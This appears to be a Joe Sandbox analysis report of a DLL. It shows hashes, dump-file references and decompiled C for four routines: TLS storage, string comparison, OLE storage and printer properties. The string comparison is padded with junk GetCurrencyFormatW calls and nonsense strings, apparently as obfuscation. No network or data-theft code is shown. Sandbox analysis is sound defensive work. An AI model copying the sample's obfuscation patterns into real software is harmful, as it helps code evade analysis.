Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: __alloca_probe_16$ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
String ID:
API String ID: 2586305615-0
Opcode ID: 7d36ba39bd72652906d95b9a6764dc008f6fb844193c5fed64fe356d7127ab0a
Instruction ID: 6804580c6d9db2e853958beb5b9c70fac7fcc155cdbb3eab0184ec39f158d97d
Opcode Fuzzy Hash: 7d36ba39bd72652906d95b9a6764dc008f6fb844193c5fed64fe356d7127ab0a
Instruction Fuzzy Hash: 2EA1AE35C00649DBDF11EFE4C885AAEBBB1FF04354F20415AE825AB291D774EE81DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10010915 Relevance: 13.6, APIs: 9, Instructions: 96
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E10010915(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				void* _t39;
				long _t41;
				void* _t42;
				long _t47;
				void* _t53;
				signed int _t55;
				long* _t62;
				struct _CRITICAL_SECTION* _t64;
				void* _t65;
				void* _t66;

				_push(0x10);
				E1001FBF7(E10033B54, __ebx, __edi, __esi);
				_t62 = __ecx;
				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
				_t64 = __ecx + 0x1c;
				 *(_t66 - 0x14) = _t64;
				EnterCriticalSection(_t64);
				_t36 =  *(_t66 + 8);
				if(_t36 <= 0 || _t36 >= _t62[3]) {
					LeaveCriticalSection(_t64);
				} else {
					_t65 = TlsGetValue( *_t62);
					if(_t65 == 0) {
						 *(_t66 - 4) = 0;
						_t39 = E100105C8(0x10);
						__eflags = _t39;
						if(__eflags == 0) {
							_t65 = 0;
							__eflags = 0;
						} else {
							 *_t39 = 0x100384d0;
							_t65 = _t39;
						}
						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
						_t51 =  &(_t62[5]);
						 *(_t65 + 8) = 0;
						 *(_t65 + 0xc) = 0;
						E100106E4( &(_t62[5]), _t65);
						goto L5;
					} else {
						_t55 =  *(_t66 + 8);
						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
							L5:
							_t75 =  *(_t65 + 0xc);
							if( *(_t65 + 0xc) != 0) {
								_t41 = E100010C9(_t51, __eflags, _t62[3], 4);
								_t53 = 2;
								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
							} else {
								_t47 = E100010C9(_t51, _t75, _t62[3], 4);
								_pop(_t53);
								_t42 = LocalAlloc(0, _t47);
							}
							_t76 = _t42;
							if(_t42 == 0) {
								LeaveCriticalSection( *(_t66 - 0x14));
								_t42 = E10004E3A(0, _t53, _t62, _t65, _t76);
							}
							 *(_t65 + 0xc) = _t42;
							E10020F40(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
							 *(_t65 + 8) = _t62[3];
							TlsSetValue( *_t62, _t65);
							_t55 =  *(_t66 + 8);
						}
					}
					_t36 =  *(_t65 + 0xc);
					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
					}
					LeaveCriticalSection( *(_t66 - 0x14));
				}
				return E1001FC9C(_t36);
			}

0x10010915
0x1001091c
0x10010921
0x10010923
0x10010926
0x1001092a
0x1001092d
0x10010933
0x1001093a
0x10010a3c
0x10010949
0x10010951
0x10010955
0x10010989
0x1001098c
0x10010991
0x10010993
0x1001099f
0x1001099f
0x10010995
0x10010995
0x1001099b
0x1001099b
0x100109a1
0x100109a6
0x100109a9
0x100109ac
0x100109af
0x00000000
0x10010957
0x10010957
0x1001095d
0x1001096c
0x1001096c
0x1001096f
0x100109d3
0x100109d9
0x100109de
0x10010971
0x10010976
0x1001097c
0x1001097f
0x1001097f
0x100109e4
0x100109e6
0x100109eb
0x100109f1
0x100109f1
0x100109f9
0x10010a0a
0x10010a16
0x10010a1b
0x10010a21
0x10010a21
0x1001095d
0x10010a24
0x10010a29
0x10010a33
0x10010a33
0x10010a3c
0x10010a3c
0x10010a47

APIs

__EH_prolog3_catch.LIBCMT ref: 1001091C
EnterCriticalSection.KERNEL32(?,00000010,10010ACA,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD), ref: 1001092D
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD,00000000), ref: 1001094B
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 1001097F
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD,00000000), ref: 100109EB
_memset.LIBCMT ref: 10010A0A
TlsSetValue.KERNEL32(?,00000000,00000058,10003840), ref: 10010A1B
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD,00000000), ref: 10010A3C

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: ce974ed0f0f987bdcecbe95e2976648c49878f8f168887bcc8d6339403368800
Instruction ID: c7db6ee6c4a6de8547c75bf432caa67de510ee99b88e2ce085b1988c099b2997
Opcode Fuzzy Hash: ce974ed0f0f987bdcecbe95e2976648c49878f8f168887bcc8d6339403368800
Instruction Fuzzy Hash: 5431BC70600606AFE721DF10CC95C5ABBB5FF04350B61C52AF9869F562CBB1ED90CB91

Uniqueness

Uniqueness Score: -1.00%

Function 10001395 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 104
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10001395(signed short* _a4, signed short* _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				void* _t31;
				void* _t34;
				signed int _t36;
				short* _t56;
				short* _t76;

				_t31 = E10001380(_a4);
				if(_t31 == E10001380(_a8)) {
					_v4 = _v4 & 0x00000000;
					if(E10001380(_a4) <= 0) {
						L12:
						_t34 = 0;
						L13:
						return _t34;
					}
					_t76 = L"xadqsavcbdfewescGADW";
					_t56 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
					while(1) {
						_t36 =  *_a4 & 0x0000ffff;
						_v8 = _t36;
						_v12 =  *_a8 & 0x0000ffff;
						if(_t36 >= 0x41 && (_v8 & 0x0000ffff) <= GetCurrencyFormatW(0, 0x11d4, _t56, 0, _t76, 0x22b9) *  *0x100440dc + 0x5a) {
							_v8 = _v8 + GetCurrencyFormatW(0, 0x11d4, _t56, 0, _t76, 0x22b9) *  *0x100440d0 + 0x20;
						}
						if(_v12 >= 0x41 && (_v12 & 0x0000ffff) <= GetCurrencyFormatW(0, 0x11d4, _t56, 0, _t76, 0x22b9) *  *0x100440d0 + 0x5a) {
							_t19 = GetCurrencyFormatW(0, 0x11d4, _t56, 0, _t76, 0x22b9) *  *0x100440d0 + 0x20; // 0x61
							_v12 = _v12 + _t19;
						}
						if(_v8 != _v12) {
							break;
						}
						_a4 =  &(_a4[1]);
						_v4 = _v4 + 1;
						_a8 =  &(_a8[1]);
						if(_v4 < E10001380(_a4)) {
							continue;
						}
						goto L12;
					}
					_t34 = 1;
					goto L13;
				}
				return 1;
			}

0x1000139c
0x100013b0
0x100013ba
0x100013cf
0x100014c0
0x100014c0
0x100014c2
0x00000000
0x100014c5
0x100013db
0x100013e0
0x100013ea
0x100013ee
0x100013fc
0x10001400
0x10001404
0x10001444
0x10001444
0x1000144e
0x1000148a
0x1000148e
0x1000148e
0x1000149c
0x00000000
0x00000000
0x1000149e
0x100014a7
0x100014ab
0x100014ba
0x00000000
0x00000000
0x00000000
0x100014ba
0x100014cc
0x00000000
0x100014cc
0x00000000

APIs

GetCurrencyFormatW.KERNEL32 ref: 10001412
GetCurrencyFormatW.KERNEL32 ref: 10001433
GetCurrencyFormatW.KERNEL32 ref: 1000145C
GetCurrencyFormatW.KERNEL32 ref: 1000147D

Strings

xadqsavcbdfewescGADW, xrefs: 100013DB, 1000140B, 1000142C, 10001455, 10001476
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 100013E0, 1000140E, 1000142F, 10001458, 10001479
A, xrefs: 10001448

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: A$eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-1548561649
Opcode ID: ff66f9b222791484f9004abab8941d8b3f5860db612cf30440ee761440cc1f47
Instruction ID: 41e55657c6f233ddb2d2aa4512fb1aa83921a4b3024967986a1fac65e9f116a1
Opcode Fuzzy Hash: ff66f9b222791484f9004abab8941d8b3f5860db612cf30440ee761440cc1f47
Instruction Fuzzy Hash: 8B31E434608346AFE704DF51DC81F6BBBE8FB85789F10481EFA84961D0E7B49948CB62

Uniqueness

Uniqueness Score: -1.00%

Function 10016311 Relevance: 12.3, APIs: 8, Instructions: 297
memoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E10016311(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t114;
				intOrPtr _t118;
				intOrPtr* _t119;
				void* _t120;
				intOrPtr* _t121;
				void* _t122;
				intOrPtr* _t125;
				intOrPtr* _t127;
				void _t129;
				intOrPtr* _t131;
				long _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				void _t139;
				void _t141;
				void* _t143;
				void* _t144;
				void* _t147;
				void* _t148;
				void _t149;
				void* _t151;
				intOrPtr* _t153;
				void* _t154;
				void _t158;
				void* _t159;
				void _t161;
				intOrPtr* _t163;
				void* _t168;
				intOrPtr* _t170;
				intOrPtr* _t172;
				intOrPtr* _t174;
				void* _t175;
				intOrPtr _t186;
				intOrPtr* _t206;
				void* _t210;
				intOrPtr* _t219;
				intOrPtr* _t221;
				void* _t222;
				void* _t224;

				_push(0x68);
				_t114 = E1001FBC4(E100340BB, __ebx, __edi, __esi);
				_t221 = __ecx;
				 *((intOrPtr*)(_t224 - 0x24)) = __ecx;
				_t219 = __ecx + 0x50;
				 *(_t224 - 0x10) = 0;
				if( *_t219 != 0) {
					L2:
					 *(_t224 + 8) = 0;
					 *(_t224 - 0x14) = 0;
					 *((intOrPtr*)(_t224 + 0x14)) = 0;
					E10014BD2(_t221, _t221 + 0x40);
					_t118 =  *((intOrPtr*)( *_t221 + 0xc0))();
					 *((intOrPtr*)(_t224 - 0x20)) = _t118;
					if(_t118 != 0) {
						L5:
						_t222 =  *(_t224 + 0xc);
						if(_t222 == 0) {
							__eflags =  *(_t224 + 0x10);
							if( *(_t224 + 0x10) != 0) {
								L16:
								_t119 =  *_t219;
								_t210 = _t224 - 0x14;
								_t120 =  *((intOrPtr*)( *_t119))(_t119, 0x1003b26c, _t210);
								__eflags = _t120;
								if(_t120 < 0) {
									L43:
									if( *(_t224 - 0x10) >= 0) {
										L46:
										_t121 =  *((intOrPtr*)(_t224 + 0x14));
										if(_t121 != 0) {
											 *((intOrPtr*)( *_t121 + 8))(_t121);
										}
										if( *((intOrPtr*)(_t224 - 0x20)) != 0 &&  *(_t224 - 0x10) >= 0) {
											 *(_t224 - 0x10) = 1;
										}
										_t122 =  *(_t224 - 0x10);
										L52:
										return E1001FC9C(_t122);
									}
									L44:
									_t125 =  *_t219;
									if(_t125 != 0) {
										 *((intOrPtr*)( *_t125 + 0x18))(_t125, 1);
										_t127 =  *_t219;
										 *((intOrPtr*)( *_t127 + 8))(_t127);
										 *_t219 = 0;
									}
									goto L46;
								}
								__eflags = _t222;
								if(_t222 != 0) {
									__eflags =  *(_t224 + 0x10);
									if( *(_t224 + 0x10) == 0) {
										 *(_t224 - 0x10) = 0x8000ffff;
										L37:
										_t129 =  *(_t224 - 0x14);
										L38:
										 *((intOrPtr*)( *_t129 + 8))(_t129);
										L39:
										if( *(_t224 - 0x10) < 0) {
											goto L44;
										}
										if( *((intOrPtr*)(_t224 - 0x20)) == 0) {
											_t186 =  *((intOrPtr*)(_t224 - 0x24));
											if(( *(_t186 + 0x70) & 0x00020000) == 0) {
												_t131 =  *_t219;
												 *(_t224 - 0x10) =  *((intOrPtr*)( *_t131 + 0xc))(_t131, _t186 + 0xc8);
											}
										}
										goto L43;
									}
									_t134 =  *((intOrPtr*)( *_t222 + 0x30))();
									__eflags = _t210;
									 *(_t224 - 0x2c) = _t134;
									if(__eflags > 0) {
										L29:
										 *(_t224 - 0x10) = 0x8007000e;
										 *(_t224 + 0x10) = 0;
										L30:
										__eflags =  *(_t224 + 0x10);
										 *(_t224 - 0x1c) = 0;
										if( *(_t224 + 0x10) == 0) {
											goto L37;
										}
										_t135 = _t224 - 0x1c;
										__imp__CreateILockBytesOnHGlobal( *(_t224 + 0x10), 1, _t135);
										__eflags = _t135;
										 *(_t224 - 0x10) = _t135;
										if(_t135 < 0) {
											goto L37;
										}
										_t136 = _t224 - 0x18;
										 *(_t224 - 0x18) = 0;
										__imp__StgOpenStorageOnILockBytes( *(_t224 - 0x1c), 0, 0x12, 0, 0, _t136);
										__eflags = _t136;
										 *(_t224 - 0x10) = _t136;
										if(_t136 >= 0) {
											_t139 =  *(_t224 - 0x14);
											 *(_t224 - 0x10) =  *((intOrPtr*)( *_t139 + 0x18))(_t139,  *(_t224 - 0x18));
											_t141 =  *(_t224 - 0x18);
											 *((intOrPtr*)( *_t141 + 8))(_t141);
										}
										_t137 =  *(_t224 - 0x1c);
										L35:
										 *((intOrPtr*)( *_t137 + 8))(_t137);
										goto L37;
									}
									if(__eflags < 0) {
										L26:
										_t143 = GlobalAlloc(0, _t134);
										__eflags = _t143;
										 *(_t224 + 0x10) = _t143;
										if(_t143 == 0) {
											goto L29;
										}
										_t144 = GlobalLock(_t143);
										__eflags = _t144;
										if(_t144 == 0) {
											goto L29;
										}
										 *((intOrPtr*)( *_t222 + 0x34))(_t144,  *(_t224 - 0x2c));
										GlobalUnlock( *(_t224 + 0x10));
										goto L30;
									}
									__eflags = _t134 - 0xffffffff;
									if(_t134 >= 0xffffffff) {
										goto L29;
									}
									goto L26;
								}
								_t147 = _t224 + 0xc;
								 *(_t224 + 0xc) = 0;
								__imp__CreateILockBytesOnHGlobal(0, 1, _t147);
								__eflags = _t147;
								 *(_t224 - 0x10) = _t147;
								if(_t147 < 0) {
									goto L37;
								}
								_t148 = _t224 + 0x10;
								 *(_t224 + 0x10) = 0;
								__imp__StgCreateDocfileOnILockBytes( *(_t224 + 0xc), 0x1012, 0, _t148);
								__eflags = _t148;
								 *(_t224 - 0x10) = _t148;
								if(_t148 >= 0) {
									_t149 =  *(_t224 - 0x14);
									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t149 + 0x14))(_t149,  *(_t224 + 0x10));
									_t151 =  *(_t224 + 0x10);
									 *((intOrPtr*)( *_t151 + 8))(_t151);
								}
								_t137 =  *(_t224 + 0xc);
								goto L35;
							}
							L11:
							_t153 =  *_t219;
							_t213 = _t224 + 8;
							_t154 =  *((intOrPtr*)( *_t153))(_t153, 0x1003b2fc, _t224 + 8);
							__eflags = _t154;
							if(_t154 < 0) {
								goto L16;
							} else {
								__eflags = _t222;
								if(__eflags != 0) {
									E100131E9(0, _t224 - 0x74, _t213, _t219, _t222, __eflags);
									 *(_t224 - 4) = 0;
									E1001E462(_t224 - 0x2c, _t224 - 0x74);
									_t158 =  *(_t224 + 8);
									_t159 =  *((intOrPtr*)( *_t158 + 0x14))(_t158, _t224 - 0x2c, _t222, 1, 0x1000, 0);
									_t47 = _t224 - 4;
									 *_t47 =  *(_t224 - 4) | 0xffffffff;
									__eflags =  *_t47;
									 *(_t224 - 0x10) = _t159;
									E100131AB(0, _t224 - 0x74, _t224 - 0x2c, _t219, _t222,  *_t47);
								} else {
									_t161 =  *(_t224 + 8);
									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t161 + 0x20))(_t161);
								}
								_t129 =  *(_t224 + 8);
								goto L38;
							}
						}
						if( *(_t224 + 0x10) != 0) {
							goto L16;
						}
						_t163 =  *_t219;
						_push(_t224 + 0x14);
						_push(0x1003b30c);
						_push(_t163);
						if( *((intOrPtr*)( *_t163))() < 0) {
							goto L11;
						}
						_push(0);
						_push(0);
						_push(0);
						_push(3);
						if( *((intOrPtr*)( *_t222 + 0x50))() == 0) {
							goto L11;
						} else {
							 *(_t224 + 0x10) = 0;
							_t168 =  *((intOrPtr*)( *_t222 + 0x50))(0, 0xffffffff, _t224 + 0x10, _t224 + 0xc);
							_t206 =  *((intOrPtr*)(_t224 + 0x14));
							 *(_t224 - 0x10) =  *((intOrPtr*)( *_t206 + 0x14))(_t206,  *(_t224 + 0x10), _t168);
							_t170 =  *((intOrPtr*)(_t224 + 0x14));
							 *((intOrPtr*)( *_t170 + 8))(_t170);
							 *((intOrPtr*)(_t224 + 0x14)) = 0;
							goto L39;
						}
					}
					_t172 =  *_t219;
					 *((intOrPtr*)( *_t172 + 0x58))(_t172, 1, _t221 + 0x70);
					if(( *(_t221 + 0x70) & 0x00020000) == 0) {
						goto L5;
					}
					_t174 =  *_t219;
					_t175 =  *((intOrPtr*)( *_t174 + 0xc))(_t174, _t221 + 0xc8);
					 *(_t224 - 0x10) = _t175;
					if(_t175 < 0) {
						goto L44;
					}
					goto L5;
				}
				_t122 = E100149D9(_t114, __ecx,  *(_t224 + 8), 0, 3, 0x1003b1ec, _t219,  *((intOrPtr*)(_t224 + 0x14)));
				 *(_t224 - 0x10) = _t122;
				if(_t122 < 0) {
					goto L52;
				}
				goto L2;
			}

0x10016311
0x10016318
0x1001631d
0x1001631f
0x10016324
0x10016329
0x1001632c
0x1001634d
0x10016353
0x10016356
0x10016359
0x1001635c
0x10016365
0x1001636d
0x10016370
0x100163a3
0x100163a3
0x100163a8
0x1001640d
0x10016410
0x1001647c
0x1001647c
0x10016480
0x1001648a
0x1001648c
0x1001648e
0x100165dd
0x100165e0
0x100165fa
0x100165fa
0x100165ff
0x10016604
0x10016604
0x1001660a
0x10016611
0x10016611
0x10016618
0x1001661b
0x10016620
0x10016620
0x100165e2
0x100165e2
0x100165e6
0x100165ed
0x100165f0
0x100165f5
0x100165f8
0x100165f8
0x00000000
0x100165e6
0x10016494
0x10016496
0x100164f0
0x100164f3
0x100165a5
0x100165ac
0x100165ac
0x100165af
0x100165b2
0x100165b5
0x100165b8
0x00000000
0x00000000
0x100165bd
0x100165bf
0x100165c9
0x100165cb
0x100165da
0x100165da
0x100165c9
0x00000000
0x100165bd
0x100164fd
0x10016500
0x10016502
0x10016505
0x1001653e
0x1001653e
0x10016545
0x10016548
0x10016548
0x1001654b
0x1001654e
0x00000000
0x00000000
0x10016550
0x10016559
0x1001655f
0x10016561
0x10016564
0x00000000
0x00000000
0x10016566
0x10016572
0x10016575
0x1001657b
0x1001657d
0x10016580
0x10016582
0x1001658e
0x10016591
0x10016597
0x10016597
0x1001659a
0x1001659d
0x100165a0
0x00000000
0x100165a0
0x10016507
0x1001650e
0x10016510
0x10016516
0x10016518
0x1001651b
0x00000000
0x00000000
0x1001651e
0x10016524
0x10016526
0x00000000
0x00000000
0x10016530
0x10016536
0x00000000
0x10016536
0x10016509
0x1001650c
0x00000000
0x00000000
0x00000000
0x1001650c
0x10016498
0x1001649f
0x100164a2
0x100164a8
0x100164aa
0x100164ad
0x00000000
0x00000000
0x100164b3
0x100164c0
0x100164c3
0x100164c9
0x100164cb
0x100164ce
0x100164d0
0x100164dc
0x100164df
0x100164e5
0x100164e5
0x100164e8
0x00000000
0x100164e8
0x10016412
0x10016412
0x10016416
0x10016420
0x10016422
0x10016424
0x00000000
0x10016426
0x10016426
0x10016428
0x10016444
0x10016450
0x10016453
0x10016458
0x10016462
0x10016465
0x10016465
0x10016465
0x1001646c
0x1001646f
0x1001642a
0x1001642a
0x10016433
0x10016433
0x10016474
0x00000000
0x10016474
0x10016424
0x100163ad
0x00000000
0x00000000
0x100163b3
0x100163ba
0x100163bb
0x100163c0
0x100163c5
0x00000000
0x00000000
0x100163c9
0x100163ca
0x100163cb
0x100163cc
0x100163d5
0x00000000
0x100163d7
0x100163e6
0x100163e9
0x100163ec
0x100163f9
0x100163fc
0x10016402
0x10016405
0x00000000
0x10016405
0x100163d5
0x10016372
0x1001637d
0x10016387
0x00000000
0x00000000
0x10016389
0x10016395
0x1001639a
0x1001639d
0x00000000
0x00000000
0x00000000
0x1001639d
0x1001633d
0x10016344
0x10016347
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 10016318

Part of subcall function 100149D9: SysStringLen.OLEAUT32(?), ref: 100149E1
Part of subcall function 100149D9: CoGetClassObject.OLE32(?,?,00000000,1003B22C,?), ref: 100149FF

CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 100164A2
StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 100164C3
GlobalAlloc.KERNEL32(00000000,00000000), ref: 10016510
GlobalLock.KERNEL32 ref: 1001651E
GlobalUnlock.KERNEL32(?), ref: 10016536
CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 10016559
StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 10016575

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
String ID:
API String ID: 317715441-0
Opcode ID: 60c2ff367ba58e433878bfe60cdb3a31176345bcc59e7f0f273dcfb4529f5694
Instruction ID: 65bcce977c73c7d4b95501f4a81464407c87b4e582750ec1064cf11d2baf797c
Opcode Fuzzy Hash: 60c2ff367ba58e433878bfe60cdb3a31176345bcc59e7f0f273dcfb4529f5694
Instruction Fuzzy Hash: 20C108B090065ADFDB00DFA4CC889AEB7BAFF48344F504969F916EB251C771DA91CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10005BC3 Relevance: 12.1, APIs: 8, Instructions: 65
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E10005BC3(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x74);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x70);
							if( *(_t35 + 0x70) != 0) {
								E100110BD(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x70) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E100110BD( *(_t35 + 0x70));
								 *(_t35 + 0x70) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}

0x10005bc6
0x10005bc8
0x10005bca
0x10005bd2
0x10005bec
0x10005bf4
0x10005bfe
0x10005c05
0x10005c07
0x10005c0c
0x10005c0f
0x10005c0f
0x10005c26
0x10005c2d
0x10005c45
0x10005c4a
0x10005c4f
0x10005c4f
0x10005c55
0x10005c55
0x10005c05
0x10005c5a
0x10005c5e

APIs

GlobalLock.KERNEL32 ref: 10005BE0
lstrcmpA.KERNEL32(?,?), ref: 10005BEC
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10005BFE
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10005C1E
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10005C26
GlobalLock.KERNEL32 ref: 10005C30
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 10005C3D
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10005C55

Part of subcall function 100110BD: GlobalFlags.KERNEL32(?), ref: 100110C8
Part of subcall function 100110BD: GlobalUnlock.KERNEL32(?,?,00000000,10005C4F,?,00000000,?,?,00000000,00000000,00000002), ref: 100110DA
Part of subcall function 100110BD: GlobalFree.KERNEL32 ref: 100110E5

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

